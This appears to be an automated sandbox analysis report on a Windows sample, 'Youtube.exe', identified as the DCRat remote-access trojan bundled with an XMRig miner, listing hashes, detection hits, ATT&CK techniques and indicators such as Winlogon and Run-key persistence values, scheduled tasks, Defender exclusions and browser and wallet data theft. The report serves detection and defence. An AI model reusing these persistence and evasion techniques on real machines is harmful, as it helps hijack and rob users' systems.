dcrat | 53d6112deaab099a9da782ba5fe8ccf729b2b1328bb0a62afdc9f09f9cd427c6

Analysis

max time kernel
90s
max time network
93s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
17-07-2024 13:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Youtube.exe
Size

8.7MB
MD5

d25ebdfc04bdadea74017fa72f90781f
SHA1

f7278c4d04fc4db888368e0245d7607d8bcbb557
SHA256

9f30de67eacb0138506eff3c67dc9c52b0e923416dc75722ac90b12210b5383f
SHA512

77cca4e741a6f96cc35a3ce55c3f899f902719c8ee29c84a6f5dcb57e9d6b8f85cad2042486ff907046f3c87673f5a34da73730256822d090ae764ba21064e71
SSDEEP

196608:fE7JB0tYrXLW+d7UcIxptvyUQymRDSI1WCOK5m:fE9B0OjrdLK4J/Y

Score

10^/10

dcrat xmrig execution infostealer miner persistence rat spyware stealer

Malware Config

Signatures

DcRat 14 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

description	ioc	pid	Process
		1948	schtasks.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings		DCRatBuild.exe
		2252	schtasks.exe
		1804	schtasks.exe
		708	schtasks.exe
		3176	schtasks.exe
		1984	schtasks.exe
		4424	schtasks.exe
		228	schtasks.exe
		1892	schtasks.exe
		2228	schtasks.exe
		5072	schtasks.exe
		4348	schtasks.exe
		236	schtasks.exe

Modifies WinLogon for persistence 2 TTPs 4 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\wscript.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\""	Roblox.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\wscript.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\""	Roblox.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\wscript.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\wscript.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\""	Refcrt.exe

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1948	1772	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2252	1772	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2228	1772	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5072	1772	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1804	1772	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	708	1772	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4348	1772	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1984	1772	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4424	1772	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	236	1772	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	228	1772	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1892	1772	schtasks.exe	87

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

DCRat payload 6 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x000900000001ab5a-3.dat	dcrat
behavioral1/memory/3608-27-0x0000000000400000-0x0000000000CC7000-memory.dmp	dcrat
behavioral1/files/0x000700000001ac48-32.dat	dcrat
behavioral1/memory/208-35-0x0000000000400000-0x000000000069B000-memory.dmp	dcrat
behavioral1/files/0x000700000001ac53-66.dat	dcrat
behavioral1/memory/4364-68-0x0000000000C50000-0x0000000000DD4000-memory.dmp	dcrat

XMRig Miner payload 8 IoCs

miner

resource	yara_rule
behavioral1/memory/5640-3545-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/5640-3548-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/5640-3554-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/5640-3556-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/5640-3555-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/5640-3553-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/5640-3552-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/5640-3632-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 23 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1404	powershell.exe
1376	powershell.exe
2496	powershell.exe
732	powershell.exe
2972	powershell.exe
1396	powershell.exe
4552	powershell.exe
2460	powershell.exe
620	powershell.exe
2668	powershell.exe
2960	powershell.exe
468	powershell.exe
4308	powershell.exe
6028	powershell.exe
2948	powershell.exe
4568	powershell.exe
4764	powershell.exe
4508	powershell.exe
4780	powershell.exe
4292	powershell.exe
1612	powershell.exe
8	powershell.exe
1912	powershell.exe

Downloads MZ/PE file

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/3608-27-0x0000000000400000-0x0000000000CC7000-memory.dmp	net_reactor

Executes dropped EXE 14 IoCs

pid	Process
208	Result.exe
3276	DCRatBuild.exe
3636	Bloxstrap.exe
2164	SolaraBootstrapper.exe
1452	Frage build.exe
1504	solara.exe
4364	Refcrt.exe
4492	Idle.exe
4104	ComContainerbrowserRefRuntime.exe
1544	Roblox.exe
5264	ComContainerbrowserRefRuntime.exe
1156	Bloxstrap.exe
5244	Roblox.exe
5204	sihost64.exe

Loads dropped DLL 11 IoCs

pid	Process
3632	MsiExec.exe
3632	MsiExec.exe
332	MsiExec.exe
332	MsiExec.exe
332	MsiExec.exe
332	MsiExec.exe
332	MsiExec.exe
4764	MsiExec.exe
4764	MsiExec.exe
4764	MsiExec.exe
3632	MsiExec.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\""	Roblox.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\""	Roblox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\""	Roblox.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\""	Roblox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Recovery\\WindowsRE\\wscript.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Recovery\\WindowsRE\\wscript.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Recovery\\WindowsRE\\Idle.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Recovery\\WindowsRE\\Idle.exe\""	Refcrt.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
11	2720	msiexec.exe
13	2720	msiexec.exe
16	2720	msiexec.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	ip-api.com
23	ipinfo.io
24	ipinfo.io

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	\??\c:\Windows\System32\CSC87E29C5A11BC4BEE91B03EA91E794C1.TMP	csc.exe
File created	\??\c:\Windows\System32\leoba4.exe	csc.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 5676 set thread context of 5640	5676	conhost.exe	194

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\readable-stream\lib\stream\promises.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\simple_copy.py	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmexec\lib\run-script.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\minipass-fetch\lib\abort-error.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\ca\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\minipass-fetch\lib\request.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmpublish\lib\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\make-fetch-happen\lib\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\run-script\lib\run-script.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\unique-slug\lib\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cacache\lib\util\hash-to-segments.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\git\lib\revs.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\system\has-flag.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\readable-stream\lib\_stream_readable.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tar\lib\normalize-windows-path.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\minimatch\dist\mjs\index.js.map	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\readable-stream\lib\internal\streams\add-abort-signal.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\x509\asn1\length.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\cacache\node_modules\minimatch\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\metavuln-calculator\lib\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\orgs.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\columnify\width.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-pack.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\common-ancestor-path\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmdiff\lib\format-diff.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\chalk\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\iconv-lite\encodings\utf32.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\inflight\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmsearch\README.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tar\lib\large-numbers.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\commands\stop.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\store.d.ts	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\lib\progress-bar.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\docs\binding.gyp-files-in-the-wild.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\cacache\node_modules\glob\common.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\color-support\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\npm-packlist\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man1\npm-explore.1	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\readable-stream\lib\internal\streams\end-of-stream.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\fs-minipass\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\delegates\License	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\socks\typings\client\socksclient.d.ts	msiexec.exe
File created	C:\Program Files (x86)\Windows Portable Devices\ebf1f9fa8afd6d	ComContainerbrowserRefRuntime.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man7\scripts.7	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\commands\ping.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\minor.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmhook\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man5\package-lock-json.5	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\commands\uninstall.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\.github\ISSUE_TEMPLATE.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\utils\ping.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\models\key.d.ts	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-config.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\package-json\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\npm-registry-fetch\LICENSE.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\node-gyp\lib\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man1\npm-unstar.1	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\gauge\lib\spin.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\selectors\root.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\common-ancestor-path\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\models\targets.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\utils\guard.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tar\node_modules\fs-minipass\node_modules\minipass\LICENSE	msiexec.exe

Drops file in Windows directory 24 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA375.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA944.tmp	msiexec.exe
File opened for modification	C:\Windows\INF\cmd.exe	ComContainerbrowserRefRuntime.exe
File opened for modification	C:\Windows\Installer\MSIAD3.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICF7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e5797bc.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\INF\cmd.exe	ComContainerbrowserRefRuntime.exe
File created	C:\Windows\INF\ebf1f9fa8afd6d	ComContainerbrowserRefRuntime.exe
File opened for modification	C:\Windows\Installer\MSIB58C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA35.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA385.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB56B.tmp	msiexec.exe
File created	C:\Windows\Installer\e5797c0.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1073.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA993.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA2C8.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA645.tmp	msiexec.exe
File created	C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon	msiexec.exe
File opened for modification	C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon	msiexec.exe
File created	C:\Windows\Installer\e5797bc.msi	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 4 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	MsiExec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b	msiexec.exe

Modifies registry class 36 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\PackageName = "node-v18.16.0-x64.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media\1 = ";"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeEtwSupport = "NodeRuntime"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\DocumentationShortcuts	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\PackageCode = "347C7A52EDBDC9A498427C0BC7ABB536"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Language = "1033"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	solara.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	DCRatBuild.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Version = "303038464"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductIcon = "C:\\Windows\\Installer\\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\\NodeIcon"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNode = "EnvironmentPath"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\npm	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductName = "Node.js"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPath	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	Roblox.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNpmModules = "EnvironmentPath"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\5B532AFE1A6C6E24B99C208A5DF6C1CD	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	ComContainerbrowserRefRuntime.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\corepack	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AdvertiseFlags = "388"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	Frage build.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeRuntime	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\InstanceType = "0"	msiexec.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5740	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1948	schtasks.exe
1804	schtasks.exe
4424	schtasks.exe
2252	schtasks.exe
4348	schtasks.exe
1984	schtasks.exe
228	schtasks.exe
708	schtasks.exe
236	schtasks.exe
2228	schtasks.exe
5072	schtasks.exe
3176	schtasks.exe
1892	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2164	SolaraBootstrapper.exe
2164	SolaraBootstrapper.exe
4364	Refcrt.exe
4364	Refcrt.exe
4780	powershell.exe
4780	powershell.exe
1376	powershell.exe
1376	powershell.exe
1404	powershell.exe
1404	powershell.exe
1376	powershell.exe
4780	powershell.exe
1404	powershell.exe
1376	powershell.exe
1404	powershell.exe
4780	powershell.exe
4492	Idle.exe
4492	Idle.exe
2720	msiexec.exe
2720	msiexec.exe
1752	conhost.exe
4292	powershell.exe
4292	powershell.exe
4292	powershell.exe
4292	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4104	ComContainerbrowserRefRuntime.exe
4492	Idle.exe
4492	Idle.exe
4492	Idle.exe
4492	Idle.exe
4492	Idle.exe
4492	Idle.exe
4492	Idle.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2164	SolaraBootstrapper.exe
Token: SeDebugPrivilege	4364	Refcrt.exe
Token: SeDebugPrivilege	4780	powershell.exe
Token: SeDebugPrivilege	1404	powershell.exe
Token: SeDebugPrivilege	1376	powershell.exe
